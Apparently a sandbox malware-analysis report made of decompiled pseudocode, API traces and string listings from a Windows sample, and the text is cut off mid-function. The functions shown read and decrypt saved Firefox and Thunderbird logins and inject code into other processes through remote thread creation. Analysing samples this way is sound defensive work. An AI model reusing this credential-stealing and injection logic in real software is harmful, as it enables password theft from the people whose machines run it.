Part of subcall function 0103B87D: RegCloseKey.ADVAPI32(01039E8E,?,00000104,00000000), ref: 0103B906

lstrcatW.KERNEL32(?,\firefox.exe), ref: 0103A3F1
GetBinaryTypeW.KERNEL32(?,?), ref: 0103A402
GetPrivateProfileStringW.KERNEL32 ref: 0103A882

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 01033384: wsprintfW.USER32 ref: 0103339F

Part of subcall function 0103373F: lstrcpyW.KERNEL32 ref: 01033769

Part of subcall function 01033666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,01034FB1,?), ref: 01033693
Part of subcall function 01033666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,01034FB1,?,?,?,?,?,00000000), ref: 010336BE

CopyFileW.KERNEL32(?,?,00000000,.tmp,00000000,010476A4,\logins.json,?), ref: 0103A579

Strings

encryptedPassword, xrefs: 0103A6AE
.tmp, xrefs: 0103A560
\firefox.exe, xrefs: 0103A3E5
Path, xrefs: 0103A87A
profiles.ini, xrefs: 0103A444
hostname, xrefs: 0103A631
Profile, xrefs: 0103A380, 0103A451, 0103A484
firefox.exe, xrefs: 0103A3C3
\Mozilla\Firefox\, xrefs: 0103A42B
\logins.json, xrefs: 0103A51F
encryptedUsername, xrefs: 0103A5E1, 0103A671

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyDispatcherExceptionFileFreeOpenPrivateProfileQueryStringTypeUserValueVirtualwsprintf
String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
API String ID: 1388061207-815594582
Opcode ID: 9f77d93c2fbd0bed472afeae42e41824129cf927aad520a23f7c2d6a4aa154d6
Instruction ID: 810cb8e46a0e795308a43f99e43a8f34d478297d1424fba069e29a7df61a0467
Opcode Fuzzy Hash: 9f77d93c2fbd0bed472afeae42e41824129cf927aad520a23f7c2d6a4aa154d6
Instruction Fuzzy Hash: 68E11971E0111AAFDB15EBA1DCD1DEEB77DBFA4200F10406AE596AB1A0DF30AE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01039E2D Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01039E2D(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				long _v56;
				int _v60;
				int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				void* _v104;
				int _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				int _v152;
				long _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				long _t171;
				int _t182;
				int _t183;
				int _t186;
				int _t200;
				WCHAR* _t208;
				void* _t210;
				int _t214;
				void* _t223;
				void* _t229;
				void* _t235;
				int _t279;
				int _t281;
				char* _t321;
				void* _t382;
				intOrPtr _t385;
				intOrPtr _t387;
				WCHAR* _t392;
				int _t393;
				void* _t394;
				void* _t395;
				void* _t396;

				_t396 = __eflags;
				_t385 = __ecx;
				_v32 = __ecx;
				E010336F7( &_v24, L"Profile");
				_t279 = 0;
				E01031052( &_v1224, 0, 0x208);
				_v56 = 0;
				_v156 = 0;
				E01031052( &_v704, 0, 0x104);
				_t395 = _t394 + 0x14;
				_t381 =  &_v704;
				E0103B87D(L"thunderbird.exe",  &_v704, _t396);
				E010336F7( &_v44,  &_v704);
				GetBinaryTypeW( &_v704,  &_v156);
				E0103373F(_t395,  &_v44);
				_t289 = _t385;
				if(E0103ADE3(_t385,  &_v704,  &_v44) != 0) {
					L3:
					E0103357C( &_a4, _t381, __eflags, L"\\Thunderbird\\");
					E0103373F( &_v36,  &_a4);
					E0103357C( &_v36, _t381, __eflags, L"profiles.ini");
					E01033549( &_v24, E010336F7( &_v40, L"Profile"));
					E01035FEB(_v40);
					E01033384( &_v24, _t381, __eflags, _t279);
					_push(_v36);
					_push(0x104);
					while(1) {
						_t389 = _v24;
						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
						__eflags = _t171;
						if(_t171 == 0) {
							break;
						}
						_v56 = _v56 + 1;
						E01033549( &_v24, E010336F7( &_v60, L"Profile"));
						E01035FEB(_v60);
						_v60 = _t279;
						E01033384( &_v24, _t381, __eflags, _v56 + 1);
						E0103373F( &_v12,  &_a4);
						E0103357C( &_v12, _t381, __eflags,  &_v1224);
						E01033666( &_v12,  &_v28);
						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
						__eflags = _t182;
						if(_t182 == 0) {
							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
							_v152 = _t183;
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							} else {
								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
								_t395 = _t395 + 0xc;
								__eflags = _t186;
								if(_t186 != 0) {
									goto L5;
								} else {
									E0103373F( &_v20,  &_v12);
									E0103357C( &_v20, _t381, __eflags, L"\\logins.json");
									_t382 = 0x1a;
									E01040C8A( &_v16, _t382, __eflags);
									E0103357C( &_v16, _t382, __eflags, "\\");
									_t381 = 8;
									E01033447( &_v16, __eflags, E010335B9( &_v64, _t381, __eflags));
									E01035FEB(_v64);
									_v64 = _t279;
									E0103357C( &_v16, _t381, __eflags, L".tmp");
									_t392 = _v16;
									_t386 = _v20;
									__eflags = CopyFileW(_v20, _t392, _t279);
									if(__eflags != 0) {
										E01033549( &_v20,  &_v16);
										_t386 = _v20;
									}
									E010413ED( &_v184, __eflags);
									_t321 =  &_v180;
									E01033549(_t321,  &_v20);
									_push(_t321);
									_t200 = E010416B1( &_v184, 0xc0000000);
									_t323 =  &_v184;
									__eflags = _t200;
									if(__eflags != 0) {
										_v52 = _t279;
										_v48 = _t279;
										E0104135C( &_v184, _t381,  &_v52, _v164, _t279);
										_t208 = E010334D1( &_v104, "encryptedUsername");
										_t210 = E0103305D( &_v52,  &_v160);
										_t381 = _t208;
										_t281 = E0103961C(_t210, _t208, __eflags);
										_v108 = _t281;
										E01035FEB(_v160);
										_t332 = _v104;
										E01035FEB(_v104);
										__eflags = _t281;
										if(_t281 == 0) {
											_t279 = 0;
											__eflags = 0;
										} else {
											_t387 = _v32;
											_t279 = 0;
											__eflags = 0;
											_t393 = _v108;
											do {
												_v100 = 0;
												_v96 = 0;
												_v92 = 0;
												_t223 = E010334D1( &_v116, "hostname");
												E01039655( &_v40, E0103305D( &_v52,  &_v112), __eflags, _t223, _t393);
												E01035FEB(_v112);
												E01035FEB(_v116);
												_t229 = E010334D1( &_v124, "encryptedUsername");
												E01039655( &_v84, E0103305D( &_v52,  &_v120), __eflags, _t229, _t393);
												E01035FEB(_v120);
												E01035FEB(_v124);
												_t235 = E010334D1( &_v132, "encryptedPassword");
												_t381 = E0103305D( &_v52,  &_v128);
												E01039655( &_v80, _t237, __eflags, _t235, _t393);
												E01035FEB(_v128);
												E01035FEB(_v132);
												E0103A8C3(_t387, __eflags, _v84,  &_v136);
												E0103A8C3(_t387, __eflags, _v80,  &_v144);
												E01033549( &_v100, E010331AF( &_v40, __eflags,  &_v68));
												E01035FEB(_v68);
												_v68 = 0;
												E01033549( &_v96, E010331AF(E010334D1( &_v140, _v136), __eflags,  &_v72));
												E01035FEB(_v72);
												_v72 = 0;
												E01035FEB(_v140);
												E01033549( &_v92, E010331AF(E010334D1( &_v148, _v144), __eflags,  &_v76));
												E01035FEB(_v76);
												_v76 = 0;
												E01035FEB(_v148);
												_t395 = _t395 - 0x10;
												_v88 = 4;
												E01031FF2(_t395,  &_v100);
												E01032028(_t387);
												E01035FEB(_v80);
												E01035FEB(_v84);
												E01035FEB(_v40);
												_t332 =  &_v100;
												E01031441( &_v100);
												_t393 = _t393 - 1;
												__eflags = _t393;
											} while (_t393 != 0);
											_t392 = _v16;
											_t386 = _v20;
										}
										_t214 = PathFileExistsW(_t392);
										__eflags = _t214;
										if(_t214 != 0) {
											E0103373F(_t395,  &_v16);
											E0104142A(_t332);
										}
										 *((intOrPtr*)(_v32 + 0x84))(_v152);
										 *((intOrPtr*)(_v32 + 0x6c))();
										E01033148( &_v52);
										_t323 =  &_v184;
									}
									E0104140C(_t323, __eflags);
									E01035FEB(_t392);
									_v16 = _t279;
									E01035FEB(_t386);
									_v20 = _t279;
									E01035FEB(_v28);
									E01035FEB(_v12);
									_t385 = _v32;
								}
							}
						} else {
							L5:
							E01035FEB(_v28);
							E01035FEB(_v12);
						}
						_push(_v36);
						_v12 = _t279;
						_push(0x104);
					}
					E0103AD8C(_t385);
					_t279 = 1;
					__eflags = 1;
					E01035FEB(_v36);
				} else {
					E0103373F(_t395,  &_v44);
					if(E0103ADE3(_t385,  &_v704, _t289) != 0) {
						goto L3;
					} else {
						_t389 = _v24;
					}
				}
				E01035FEB(_v44);
				E01035FEB(_t389);
				E01035FEB(_a4);
				return _t279;
			}

0x01039e2d
0x01039e39
0x01039e43
0x01039e46
0x01039e50
0x01039e5a
0x01039e64
0x01039e6e
0x01039e76
0x01039e7b
0x01039e7e
0x01039e89
0x01039e99
0x01039eac
0x01039eb9
0x01039ebe
0x01039ec7
0x01039ee8
0x01039ef0
0x01039efc
0x01039f09
0x01039f1f
0x01039f27
0x01039f30
0x01039f35
0x01039f38
0x0103a31e
0x0103a31e
0x0103a32f
0x0103a335
0x0103a337
0x00000000
0x00000000
0x01039f4a
0x01039f56
0x01039f5e
0x01039f67
0x01039f6a
0x01039f76
0x01039f85
0x01039f91
0x01039f99
0x01039f9d
0x01039f9f
0x01039fb6
0x01039fbc
0x01039fc2
0x01039fc4
0x00000000
0x01039fc6
0x01039fca
0x01039fcd
0x01039fd0
0x01039fd2
0x00000000
0x01039fd4
0x01039fdb
0x01039fe8
0x01039fef
0x01039ff3
0x0103a000
0x0103a007
0x0103a014
0x0103a01c
0x0103a029
0x0103a02c
0x0103a031
0x0103a034
0x0103a040
0x0103a042
0x0103a04b
0x0103a050
0x0103a050
0x0103a059
0x0103a062
0x0103a068
0x0103a06d
0x0103a079
0x0103a07e
0x0103a084
0x0103a086
0x0103a096
0x0103a09a
0x0103a09d
0x0103a0aa
0x0103a0bb
0x0103a0c0
0x0103a0cf
0x0103a0d1
0x0103a0d4
0x0103a0d9
0x0103a0dc
0x0103a0e1
0x0103a0e3
0x0103a2a4
0x0103a2a4
0x0103a0e9
0x0103a0e9
0x0103a0ec
0x0103a0ec
0x0103a0ee
0x0103a0f1
0x0103a0fa
0x0103a0fd
0x0103a100
0x0103a103
0x0103a11a
0x0103a124
0x0103a12c
0x0103a13a
0x0103a151
0x0103a15b
0x0103a163
0x0103a171
0x0103a183
0x0103a188
0x0103a192
0x0103a19a
0x0103a1ab
0x0103a1bc
0x0103a1d1
0x0103a1d9
0x0103a1e1
0x0103a201
0x0103a209
0x0103a214
0x0103a217
0x0103a23c
0x0103a244
0x0103a24f
0x0103a252
0x0103a257
0x0103a25a
0x0103a267
0x0103a26e
0x0103a276
0x0103a27e
0x0103a286
0x0103a28b
0x0103a28e
0x0103a293
0x0103a293
0x0103a293
0x0103a29c
0x0103a29f
0x0103a29f
0x0103a2a7
0x0103a2ad
0x0103a2af
0x0103a2b8
0x0103a2bd
0x0103a2c2
0x0103a2cc
0x0103a2d6
0x0103a2dc
0x0103a2e1
0x0103a2e1
0x0103a2e7
0x0103a2ee
0x0103a2f5
0x0103a2f8
0x0103a300
0x0103a303
0x0103a30b
0x0103a310
0x0103a310
0x01039fd2
0x01039fa1
0x01039fa1
0x01039fa4
0x01039fac
0x01039fac
0x0103a313
0x0103a316
0x0103a319
0x0103a319
0x0103a33f
0x0103a349
0x0103a349
0x0103a34a
0x01039ec9
0x01039ed0
0x01039ede
0x00000000
0x01039ee0
0x01039ee0
0x01039ee0
0x01039ede
0x0103a352
0x0103a359
0x0103a361
0x0103a36c

APIs

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 0103B87D: lstrcpyW.KERNEL32 ref: 0103B8B9
Part of subcall function 0103B87D: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0103B8C7
Part of subcall function 0103B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,01039E8E,?,00000104,00000000), ref: 0103B8E0
Part of subcall function 0103B87D: RegQueryValueExW.ADVAPI32(01039E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0103B8FD
Part of subcall function 0103B87D: RegCloseKey.ADVAPI32(01039E8E,?,00000104,00000000), ref: 0103B906

GetBinaryTypeW.KERNEL32(?,?), ref: 01039EAC

Part of subcall function 0103373F: lstrcpyW.KERNEL32 ref: 01033769

Part of subcall function 0103ADE3: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0103AE11
Part of subcall function 0103ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0103AE1A
Part of subcall function 0103ADE3: PathFileExistsW.SHLWAPI(01039EC5,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 0103AF08

GetPrivateProfileStringW.KERNEL32 ref: 0103A32F

Part of subcall function 0103ADE3: PathFileExistsW.SHLWAPI(01039EC5,.dll,?,01039EC5,?,00000104,00000000), ref: 0103AF64
Part of subcall function 0103ADE3: LoadLibraryW.KERNEL32(?,01039EC5,?,00000104,00000000), ref: 0103AFA3
Part of subcall function 0103ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0103AFAE
Part of subcall function 0103ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0103AFB9
Part of subcall function 0103ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0103AFC4
Part of subcall function 0103ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0103AFCF
Part of subcall function 0103ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0103B0BC

Strings

encryptedPassword, xrefs: 0103A169
.tmp, xrefs: 0103A021
Path, xrefs: 0103A329
profiles.ini, xrefs: 01039F01
hostname, xrefs: 0103A0F2
Profile, xrefs: 01039E3E, 01039F0E, 01039F45
\logins.json, xrefs: 01039FE0
\Thunderbird\, xrefs: 01039EE8
encryptedUsername, xrefs: 0103A0A2, 0103A132
thunderbird.exe, xrefs: 01039E84

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CurrentDirectory$ExistsFilePathlstrcpylstrlen$BinaryCloseDispatcherExceptionOpenPrivateProfileQueryStringTypeUserValuelstrcat
String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
API String ID: 4293655490-1863067114
Opcode ID: d3a701c69eb34d5670ff9933c6435b055503fd0a248114eb2b645dcf8039f26d
Instruction ID: 042d6e0b1306e708f1efc61d3033cea373c41b6469bf9776c8970aef52f3a9c8
Opcode Fuzzy Hash: d3a701c69eb34d5670ff9933c6435b055503fd0a248114eb2b645dcf8039f26d
Instruction Fuzzy Hash: 8BE1F671E0111AAFDB15EBA1DCD1DEEB77DBFA4200F10406AE586AB1A0DF70AE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01037B2E Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 199
injectionmemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E01037B2E(long _a12) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				long _v24;
				signed int _t33;
				void* _t37;
				void* _t40;
				long _t49;
				_Unknown_base(*)()* _t64;
				SIZE_T* _t69;
				void* _t76;
				void* _t80;
				void* _t87;
				void* _t91;

				if( *0x1056754 == 0) {
					 *0x1056754 = E0103FB98() != 0;
				}
				_t33 = OpenProcess(0x1fffff, 0, _a12);
				_t91 = _t33;
				if(_t91 != 0) {
					_v12 = GetCurrentProcess();
					if(E010421DC( &_v12) == 0) {
						L15:
						_t64 = VirtualAllocEx(_t91, 0, 0x100000, 0x3000, 0x40);
						if(_t64 == 0) {
							L23:
							_push(0xfffffffe);
							L24:
							_pop(_t37);
							return _t37;
						}
						_v24 = _v24 & 0x00000000;
						VirtualProtectEx(_t91, _t64, 0x100000, 0x40,  &_v24);
						_t40 = VirtualAllocEx(_t91, 0x33370000, 0x100, 0x3000, 0x40);
						_v20 = _t40;
						if(_t40 == 0) {
							goto L23;
						}
						_v8 = _v8 & 0x00000000;
						_t87 = "XXXXXX";
						if(WriteProcessMemory(_t91, _v20, _t87, E01031133(_t87),  &_v8) == 0 || _v8 != E01031133(_t87)) {
							L22:
							_push(0xfffffffd);
							goto L24;
						} else {
							_v12 = 0;
							if(WriteProcessMemory(_t91, _t64, 0x104e6c0, 0x1d44,  &_v12) == 0 || _v12 != 0x1d44) {
								goto L22;
							} else {
								return CreateRemoteThread(_t91, 0, 0, _t64, 0, 0, 0);
							}
						}
					}
					_t69 =  &_v12;
					_v12 = _t91;
					if(E010421DC(_t69) != 0) {
						goto L15;
					}
					_push(_t69);
					_push(_t69);
					_t49 = E0103FBB4(_t91, 0x100000, 0, 0);
					_v24 = _t49;
					if(_t49 != 0 || 0x100000 != 0) {
						_v12 = 0;
						E0103FD0D(_t91, 0x100000, _t49, 0x100000,  &_v12,  &_v12);
						_t76 = E0103FBB4(_t91, 0x100, 0x33370000, 0);
						_v20 = _t76;
						_v16 = 0x100;
						if(_t76 != 0 || 0x100 != 0) {
							_v8 = 0;
							if(E0103FAE9(_t91, "XXXXXX", _v20, _v16, E01031133("XXXXXX"),  &_v8) == 0 || _v8 != E01031133("XXXXXX")) {
								goto L22;
							} else {
								_t90 = _v24;
								_v8 = _v8 & 0x00000000;
								_t80 = _t91;
								if(E0103FAE9(_t80, 0x104c2a8, _v24, 0x100000, 0x2412,  &_v8) == 0 || _v8 != 0x2412) {
									goto L22;
								} else {
									MessageBoxA(0, "Injecting64", "Debug", 0);
									_push(_t80);
									_push(_t80);
									asm("cdq");
									return E0103FC62(0x104c2a8, _t91, 0x104c2a8, _t90, 0x100000);
								}
							}
						} else {
							goto L23;
						}
					} else {
						goto L23;
					}
				} else {
					return _t33 | 0xffffffff;
				}
			}

0x01037b3e
0x01037b47
0x01037b47
0x01037b59
0x01037b5f
0x01037b63
0x01037b76
0x01037b80
0x01037c99
0x01037caf
0x01037cb3
0x01037d56
0x01037d56
0x01037d58
0x01037d58
0x00000000
0x01037d58
0x01037cb9
0x01037cca
0x01037ce2
0x01037ce4
0x01037ce9
0x00000000
0x00000000
0x01037ceb
0x01037cf3
0x01037d0d
0x01037d52
0x01037d52
0x00000000
0x01037d1b
0x01037d2d
0x01037d38
0x00000000
0x01037d43
0x00000000
0x01037d4a
0x01037d38
0x01037d0d
0x01037b86
0x01037b89
0x01037b93
0x00000000
0x00000000
0x01037b99
0x01037b9a
0x01037ba4
0x01037bac
0x01037bb3
0x01037bc0
0x01037bc9
0x01037be2
0x01037be7
0x01037bec
0x01037bf1
0x01037bfe
0x01037c23
0x00000000
0x01037c39
0x01037c39
0x01037c3f
0x01037c50
0x01037c5c
0x00000000
0x01037c6f
0x01037c7d
0x01037c83
0x01037c84
0x01037c88
0x00000000
0x01037c91
0x01037c5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01037b65
0x00000000
0x01037b65

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,00000000,00000000), ref: 01037B59

Part of subcall function 0103FB98: GetCurrentProcess.KERNEL32(0105697C,01037B45,00000000,00000000,00000000), ref: 0103FB9D
Part of subcall function 0103FB98: IsWow64Process.KERNEL32(00000000), ref: 0103FBA4
Part of subcall function 0103FB98: GetProcessHeap.KERNEL32 ref: 0103FBAA

GetCurrentProcess.KERNEL32 ref: 01037B6D

Part of subcall function 010421DC: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 010421F1
Part of subcall function 010421DC: GetProcAddress.KERNEL32(00000000), ref: 010421F8

MessageBoxA.USER32 ref: 01037C7D
VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040), ref: 01037CAD
VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 01037CCA
VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 01037CE2
WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 01037D05
WriteProcessMemory.KERNEL32(00000000,00000000,0104E6C0,00001D44,?), ref: 01037D30
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01037D4A

Strings

Debug, xrefs: 01037C71
Injecting64, xrefs: 01037C76
XXXXXX, xrefs: 01037C02, 01037C07, 01037C29, 01037CF3, 01037CF8, 01037D00, 01037D0F

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Process$Virtual$AllocCurrentMemoryWrite$AddressCreateHandleHeapMessageModuleOpenProcProtectRemoteThreadWow64
String ID: Debug$Injecting64$XXXXXX
API String ID: 1574360354-2389424830
Opcode ID: 09a575d8abe7ccfc7b4bf86519f94d7293b19baed1b6569a3d617f9845ec3832
Instruction ID: 54303a4c643d9a3dff2c1f2a92d6844bdc897cb1863a49d708f5b4014b2d2057
Opcode Fuzzy Hash: 09a575d8abe7ccfc7b4bf86519f94d7293b19baed1b6569a3d617f9845ec3832
Instruction Fuzzy Hash: 5351EBF5A00206BBEB25A7658D48FFF7ABCEFD5710F14019DF690E2190E7B49E0086A5

Uniqueness

Uniqueness Score: -1.00%

Function 0103D3A8 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 55
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103D3A8(short** _a4) {
				void* _t2;
				int _t8;
				void* _t13;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t17 = _t2;
				if(_t17 != 0) {
					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
					if(_t13 != 0) {
						if(StartServiceW(_t13, 0, 0) != 0) {
							L6:
							_t15 = 1;
							L7:
							CloseServiceHandle(_t17);
							CloseServiceHandle(_t13);
							_t8 = _t15;
							L8:
							return _t8;
						}
						if(GetLastError() != 0x420) {
							goto L7;
						}
						Sleep(0x7d0);
						if(StartServiceW(_t13, 0, 0) == 0) {
							goto L7;
						}
						goto L6;
					}
					CloseServiceHandle(_t17);
					_t8 = 0;
					goto L8;
				}
				return _t2;
			}

0x0103d3b4
0x0103d3b7
0x0103d3bd
0x0103d3c1
0x0103d3d2
0x0103d3d6
0x0103d3ee
0x0103d415
0x0103d417
0x0103d418
0x0103d41f
0x0103d422
0x0103d424
0x0103d426
0x00000000
0x0103d426
0x0103d3fb
0x00000000
0x00000000
0x0103d402
0x0103d413
0x00000000
0x00000000
0x00000000
0x0103d413
0x0103d3d9
0x0103d3df
0x00000000
0x0103d3df
0x0103d42a

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0103D3B7
OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0103D3CC
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D3D9
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0103D3E6
GetLastError.KERNEL32 ref: 0103D3F0
Sleep.KERNEL32(000007D0), ref: 0103D402
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0103D40B
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D41F
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D422

Strings

ServicesActive, xrefs: 0103D3AF
@Mqt, xrefs: 0103D3F0

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
String ID: @Mqt$ServicesActive
API String ID: 104619213-1382913386
Opcode ID: defe6fce4f58ab20276ddfab6612f088390f5e736791aa195b1f9da3e8a4633f
Instruction ID: b7959a0f9c4844d64bc392d7c0e7bf7cdbcf78598d63af8d39e2b4570414df70
Opcode Fuzzy Hash: defe6fce4f58ab20276ddfab6612f088390f5e736791aa195b1f9da3e8a4633f
Instruction Fuzzy Hash: 38018FB9601251BBD3311ABAAE8CE9B3EACDBC5B51B400465F785D2141CB69A80087F0

Uniqueness

Uniqueness Score: -1.00%

Function 0103D8FB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 167
servicestringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0103D8FB(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v20;
				short* _v24;
				signed int _v28;
				short** _v32;
				short* _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr* _t66;
				char* _t69;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr _t105;
				intOrPtr* _t112;
				intOrPtr _t113;
				char _t114;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t119;

				_t113 = __ecx;
				_v44 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v36 = 0;
				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
				if(_t90 == 0) {
					L9:
					_v40 = _v40 & 0x00000000;
					L10:
					E01035FEB(_v24);
					return _v40;
				}
				_v40 = 1;
				_v32 = _t113 + 0x28;
				while(1) {
					L2:
					_v16 = 0;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
					_t114 = _v20;
					_t66 = E01036045(_t114);
					_t112 = _t66;
					_t69 =  &_v20;
